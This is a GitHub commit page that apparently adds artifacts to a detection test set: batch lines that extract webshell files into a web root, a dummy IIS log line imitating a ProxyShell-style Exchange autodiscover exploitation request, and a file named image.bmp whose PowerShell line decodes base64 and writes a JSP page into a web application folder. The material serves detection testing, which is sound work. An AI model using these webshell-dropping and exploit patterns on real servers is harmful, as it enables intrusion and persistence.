Skip to content

Commit

Permalink
Merge pull request #37 from phantinuss/master
Browse files Browse the repository at this point in the history
new webshell/webserver logs of exploitation
  • Loading branch information
Neo23x0 authored Jun 20, 2022
2 parents 2b5c765 + d723610 commit 9061d12
Show file tree
Hide file tree
Showing 3 changed files with 4 additions and 0 deletions.
2 changes: 2 additions & 0 deletions test-sets/persistence/web-shells.bat
Original file line number Diff line number Diff line change
Expand Up @@ -9,3 +9,5 @@ MKDIR "%WWWROOT%"
"%ZIP%" e -p%PASS% "%TOOLARCH%" -aoa -o"%WWWROOT%" toolset\b.jsp > NUL
"%ZIP%" e -p%PASS% "%TOOLARCH%" -aoa -o"%WWWROOT%" toolset\tests.jsp > NUL
"%ZIP%" e -p%PASS% "%TOOLARCH%" -aoa -o"%WWWROOT%" toolset\shell.gif > NUL
"%ZIP%" e -p%PASS% "%TOOLARCH%" -aoa -o"%WWWROOT%" toolset\image.bmp > NUL
"%ZIP%" e -p%PASS% "%TOOLARCH%" -aoa -o"C:\inetpub\logs\LogFiles\W3SVC2" toolset\hafnium-dummy.log > NUL
1 change: 1 addition & 0 deletions toolset/hafnium-dummy.log
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
2021-08-23 09:13:18 172.28.30.86 POST /autodiscover/autodiscover.json @a.a/powershell/?&Email=autodiscover/autodiscover.json%3F@a.a&X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBtydC10ZXN0aW5nLm5leHRyb25cd2hhdGV2ZXJVLFMtMS01LTIxLTM5NTY0MzM0My0yNjk0NDY3NjIwLTE1NTc4MDY3NDgtNTAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&CorrelationID=<empty>;&cafeReqId=077855a1-9ca4-41e4-b610-745ed366d396; 443 - 10.255.249.78 Python+PSRP+Client - 200 0 0 55
1 change: 1 addition & 0 deletions toolset/image.bmp
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('')) | Out-File -Encoding 'Ascii' ..\\webapps\\adssp\\html\\help.jsp

0 comments on commit 9061d12

Please sign in to comment.